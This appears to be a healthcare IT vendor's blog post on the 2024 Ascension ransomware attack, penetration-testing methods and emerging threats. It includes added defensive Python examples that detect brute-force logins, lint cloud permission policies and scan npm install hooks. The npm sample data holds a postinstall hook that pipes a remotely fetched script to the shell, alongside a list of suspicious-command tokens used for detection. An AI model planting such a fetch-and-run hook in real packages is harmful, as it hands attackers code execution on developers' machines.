What happens when a healthcare system is hit by a cyberattack? Hospitals sever connections to their online systems. As a result, electronic health records systems, patient portals (which let patients view their medical records and communicate with their providers), phone systems, and the various systems used to order tests, procedures, and medications become unavailable. Non-emergent procedures, tests, and appointments are paused. Staff don't have patient orders and can't page doctors. Medical, nursing, and clinical teams have to fall back on manual processes and documentation methods they moved away from 20 years ago. Paper records and hand processing are once again in place for clinical activities such as dispensing medication, entering health records, ordering, and completing diagnostic tests and procedures. It's a disaster you never want to face.
Healthcare Ransomware Attacks
In May 2024, Ascension, one of the largest private healthcare systems in the United States, was hacked.
As a nurse in the emergency room at an Illinois Ascension hospital says, "we are doing three times the work, and it's taking double the time, not to mention critical patients who need to wait two to three times as long to get stat results for brain bleeds or blood clots. It is so unsafe; the staff is just so busy, overworked, and exhausted from dealing with rude patients. So many documents are going to go missing; everything is so disorganized it's unbelievable the amount of records that will go missing during this time. Now I'm going to work four times as hard, giving crappy patient care."
From May 8 to 14, Ascension staff were still struggling to address the “incident”.
However, it was not just an incident.
Health-ISAC, an organization focused on sharing information about vulnerabilities, incidents, and threats to the security and privacy of healthcare data and systems, assessed this attack as a 'major threat to the healthcare industry' in the USA.
The alert concerns Black Basta, a ransomware-as-a-service operation that encrypts and steals patient data. It follows the SaaS business model: the operators sell malware kits to hackers (affiliates), who then use them to carry out their own ransomware attacks. Affiliates purchase a kit, receive the malware and decryption keys, and, after breaking in, demand money to decrypt files. Over the past two years, this business model has already earned hackers 100 million dollars.
Health-ISAC suggests reviewing “The Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients Resources” issued by The United States Department of Health and Human Services.
In the section 'Sub-Practices for Large Organizations,' they specifically mention Penetration Testing.
Healthcare Penetration Testing
Penetration testing for healthcare is the process of controlled hacking into your own computer systems, networks, and applications before criminals have the chance to do the same and cause damage.
Penetration testing engineers conduct vulnerability scans (deep analysis of security flaws) and attempt to exploit the findings. They mimic the attack methodologies that adversaries might deploy and mix device-based, web application–based, and wireless-based attacks. The goal is to find what an attacker can do and fix discovered security holes yourself as soon as possible.
Each healthcare pen test must be documented and comply with legal and HR obligations.
Factors for Consideration in Healthcare Penetration Test Planning
Healthcare penetration testing resources
Resources could be either internal staff who already know the technical nuances of your environment or external subject matter experts with specialized skill sets in security pentesting for healthcare.
Healthcare penetration testing targets
Penetration testing targets in medical IT can include the following:
- People. Compromise individuals to test educational controls or how susceptible they are to phishing attacks.
- Data. Discover and exfiltrate sensitive data to test data security controls.
- Medical technologies. Determine how vulnerable your organization is to attacks against medical devices.
- IT assets. Compromise IT assets, such as servers or API endpoints, to test system security controls or how vulnerable your organization is to ransomware attacks.
- Infrastructure. Determine how vulnerable your organization is to digital extortion attacks, such as ransomware outbreaks.
Types of healthcare penetration testing
Depending on the level of detail regarding the target you would like to share with a tester initially, there are three levels:
- Tester is permitted to know all aspects of the target.
- Tester is permitted to know some aspects of the target.
- Tester is not permitted to know any details of the target.
The more preliminary information the tester has, the faster they can discover the vulnerabilities during application security testing for healthcare.
Methods of Healthcare Penetration Testing
Here are the most common methods.
Social Engineering Penetration Tests
These are attacks geared towards "tricking the human." The target is people. A tester tries to obtain an employee's password or another user's data. They can simulate domestic help services, messages from fake social media accounts, banks, or government officials, and use pop-up alerts to trick victims into installing malicious applications on their devices.
Web Application Penetration Tests
These are attacks centered on web application infrastructure and its components, such as databases or source code. Examples include SQL injection, cross-site scripting, and DoS attacks.
Network Penetration Testing
Testers may use port scanners to locate weak entry points, such as unusual open ports (e.g., port 80). After finding them, they may perform SQL injection or buffer overflow attacks. If successful, the system is compromised, yet it is still a trusted host inside the organization's network. From that point, the tester can move freely across the network and try to gain more access. For example, they can use brute-force methods to guess passwords and gain deeper access.
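The brute-force step above is also what the defending team should expect to see in its own logs during the test. The following detection is an added example (not code from the original article or from Belitsoft): it parses constructed OpenSSH-style authentication lines, flags a source that produces a burst of failed logins, and records whether a successful login from the same source followed the burst, which is the case that matters most.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the style of an OpenSSH auth log (illustration only, not real data).
SAMPLE_LOG = """\
2024-05-08T02:14:01 sshd[811]: Failed password for nurse01 from 10.20.30.40 port 51122 ssh2
2024-05-08T02:14:03 sshd[811]: Failed password for nurse01 from 10.20.30.40 port 51123 ssh2
2024-05-08T02:14:05 sshd[811]: Failed password for admin from 10.20.30.40 port 51124 ssh2
2024-05-08T02:14:06 sshd[811]: Failed password for root from 10.20.30.40 port 51125 ssh2
2024-05-08T02:14:09 sshd[811]: Failed password for labtech from 10.20.30.40 port 51126 ssh2
2024-05-08T02:14:12 sshd[811]: Accepted password for labtech from 10.20.30.40 port 51127 ssh2
2024-05-08T02:20:00 sshd[812]: Failed password for nurse02 from 10.20.30.77 port 40000 ssh2
2024-05-08T03:20:00 sshd[813]: Failed password for nurse02 from 10.20.30.77 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?P<user>\S+) from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse(log_text):
    """Turn matching lines into (timestamp, result, user, source_ip) tuples."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["src"]))
    return events

def detect_bruteforce(events, threshold=4, window=timedelta(minutes=5)):
    """Flag sources with at least `threshold` failed logins inside `window`, and note
    whether an accepted login from the same source followed the burst."""
    by_src = defaultdict(list)
    for ts, result, user, src in events:
        by_src[src].append((ts, result, user))
    alerts = {}
    for src, evs in by_src.items():
        evs.sort()
        fails = [e for e in evs if e[1] == "Failed"]
        for i, first in enumerate(fails):
            burst = [f for f in fails[i:] if f[0] - first[0] <= window]  # sliding window
            if len(burst) >= threshold:
                burst_end = burst[-1][0]
                alerts[src] = {
                    "failures": len(burst),
                    "users": sorted({f[2] for f in burst}),
                    "success_after": any(e[1] == "Accepted" and e[0] >= burst_end for e in evs),
                }
                break
    return alerts
```

The second source fails only twice, an hour apart, and is not flagged; a real deployment would read the log from the hospital's central log collector rather than an inline string.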
Privilege escalation
These attacks aim to gain unauthorized higher-level access to delete databases, install malware, steal sensitive files, or disable core services.
These methods can be combined.
For example, if you want to understand whether an external attacker could gain access to your EMR, you might combine social engineering, client-based, and privilege-escalation attacks.
The goal is to discover a user who has sensitive EMR access, compromise their credentials, and gain remote access to log in to the EMR with those credentials.
Cybersecurity Forecast 2024
Ascension engaged Mandiant, a cybersecurity company that provides incident response services to organizations facing cyber attacks. Mandiant is part of Google Cloud's security business. Recently, they issued a Forecast 2024 report with thoughts on what organizations and security teams should think about today.
AI in phishing
More than 90% of all cyber attacks begin with phishing: a form of communication designed to appear legitimate but aimed at stealing personal information. It often starts with clicking on links in emails. Hackers now use generative AI and large language models to create personalized, highly convincing phishing emails. They are even able to create interactive fake phone calls and deepfake videos or photos.
Risks of using edge devices and virtualization software
Edge devices (like smart home devices, security cameras, etc.) and virtualization software (for running virtual machines) are very appealing targets for hackers.
These types of systems and devices are difficult to properly monitor and secure against attacks.
Hackers use previously unknown software vulnerabilities ("zero-day") to compromise more victims before the vulnerabilities are patched. Since the developers or vendors are unaware of these issues, they haven't had any time (zero days) to fix them.
Rise of wiper malware
Wiper malware is designed to delete data from a computer. It's not ransomware, which encrypts files and demands payment to unlock them. The sole purpose of a wiper is to permanently destroy all important documents, photos, and videos.
Vulnerabilities in cloud-based systems
Organizations increasingly use a combination of on-premises and cloud-based systems (hybrid) or multiple cloud platforms (multicloud). Attackers will try to take advantage of misconfigurations (incorrect settings) in how user identities are managed. If an attacker compromises one cloud environment, they might be able to infiltrate other connected cloud platforms. Organizations need to be extra vigilant in securing their hybrid and multicloud setups. Proper configurations and strong identity management practices prevent attackers from easily moving between different cloud environments.
Serverless services in the cloud are becoming more popular among cybercriminals
No user or device should be automatically trusted (zero-trust approach to security). Companies have to implement strong security measures for their serverless applications. There are tools to monitor serverless infrastructure for unexpected spikes in resource usage or unauthorized access attempts. Multi-factor authentication and the principle of least privilege when granting access to serverless resources can be helpful.
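Both the identity misconfigurations mentioned above for hybrid and multicloud setups and the least-privilege advice for serverless resources come down to what a function's permission policy actually grants. The following linter is an added example (not code from the original article, from Belitsoft, or from Mandiant): it checks constructed IAM-style policy documents for wildcard actions, unrestricted resources, and identity-management rights, and shows a scoped policy that passes beside a broad one that does not. Region, account number, and resource names are made up.

```python
# Constructed IAM-style policies (sample data, not from any real deployment): the kind
# of overly broad permission a serverless function often ships with, beside a scoped one.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}

SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["dynamodb:GetItem", "dynamodb:PutItem"],
            "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/PatientIntake",
        },
        {
            "Effect": "Allow",
            "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
            "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/intake:*",
        },
    ],
}

def _as_list(value):
    # IAM allows a single string or a list in Action and Resource; normalize to a list.
    return value if isinstance(value, list) else [value]

def lint_policy(policy):
    """Return (statement_index, rule, message) for every Allow statement that grants
    more than least privilege. An empty list means nothing was flagged."""
    findings = []
    for idx, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action", []))
        resources = _as_list(stmt.get("Resource", []))
        if "*" in actions:
            findings.append((idx, "action-wildcard", "Action allows every API call"))
        elif any(a.endswith(":*") for a in actions):
            findings.append((idx, "service-wildcard", "Action allows every call in a service"))
        # Resource "*" is tolerated only when a Condition block narrows it further.
        if "*" in resources and "Condition" not in stmt:
            findings.append((idx, "resource-wildcard", "Resource is unrestricted"))
        # Rights over other identities are how a foothold in one environment spreads to others.
        if any(a.startswith(("iam:", "sts:AssumeRole")) for a in actions):
            findings.append((idx, "identity-management", "Statement can change or assume identities"))
    return findings
```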
Sleeper botnets
Attackers may control 'sleeper botnets' after finding and using vulnerable Internet of Things (IoT) devices, small office and home office (SOHO) devices, routers, and end-of-life devices (which can no longer receive updates). These are often less secure and easier to exploit, especially when they are not running the latest firmware and security patches.
Unlike traditional botnets, 'sleeper botnets' are activated when the time comes for stealthy operations, such as data exfiltration or surveillance.
Periodic security assessments of networks and devices may identify vulnerabilities. It's also a good idea to separate your IoT and SOHO devices from your main network by placing them on a separate VLAN or subnet.
Attacks on pre-written packages
Developers may install a malicious NPM package that lets attackers add a backdoor to the developers' source code, giving them a way to secretly access and control the software. Cybercriminals can compromise a large number of systems with the "help" of a single developer. It's a low-cost way for attackers to have a high impact.
These kinds of attacks are expected to become more common, especially as attackers start to target package managers for programming languages, which may not be as closely monitored for security issues.
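A backdoored package usually needs to run something at install time, and npm's lifecycle scripts give it that opportunity. The following check is an added example (not code from the original article or from Belitsoft): it scans constructed `package.json` contents of the kind found under `node_modules/`, lists every package that declares an install-time hook, applies crude heuristics for hooks that fetch or decode code, and separates already-reviewed packages from those that still need a look. The package names, versions, and the allowlist are made up.

```python
import json

# Constructed package.json contents, keyed as they would sit under node_modules/<name>/
# (illustrative sample data, not real packages). The hook in color-utils is the pattern
# to catch: it pulls a script from the network at install time (example.invalid is reserved).
SAMPLE_NODE_MODULES = {
    "left-pad-ish": json.dumps({"name": "left-pad-ish", "version": "1.0.0"}),
    "native-helper": json.dumps({"name": "native-helper", "version": "2.1.0",
                                 "scripts": {"install": "node-gyp rebuild"}}),
    "color-utils": json.dumps({"name": "color-utils", "version": "0.3.2",
                               "scripts": {"postinstall": "curl -fsSL https://example.invalid/setup.sh | sh"}}),
}

# Scripts npm runs automatically during `npm install`; this is where a backdoored
# package gets code execution on the developer's machine or the CI runner.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Crude heuristics for hook commands that fetch or decode code at install time.
SUSPICIOUS_TOKENS = ("curl", "wget", "base64", "eval(", "child_process", "http://", "https://")

def find_install_hooks(node_modules):
    """Return one record per package that declares an install-time lifecycle script."""
    findings = []
    for name, raw in node_modules.items():
        pkg = json.loads(raw)
        scripts = pkg.get("scripts") or {}
        hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
        if hooks:
            cmd = " ".join(hooks.values())
            findings.append({
                "name": name,
                "version": pkg.get("version"),
                "hooks": hooks,
                "suspicious": any(tok in cmd for tok in SUSPICIOUS_TOKENS),
            })
    return findings

def review(findings, allowlist):
    """Split findings into packages whose hooks were already reviewed (allowlisted by
    exact name and version, so a new version is re-reviewed) and those still needing a look."""
    allowed, unreviewed = [], []
    for f in findings:
        (allowed if allowlist.get(f["name"]) == f["version"] else unreviewed).append(f)
    return allowed, unreviewed
```

Running `npm ci --ignore-scripts` in CI and enabling hooks only for the allowlisted packages removes the install-time execution path entirely for everything else.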
Belitsoft is a custom healthcare software development company that helps cybersecurity software product companies enlarge their teams of cybersecurity software developers and testers on a part-time or full-time basis. Check out our recent case study on the topic.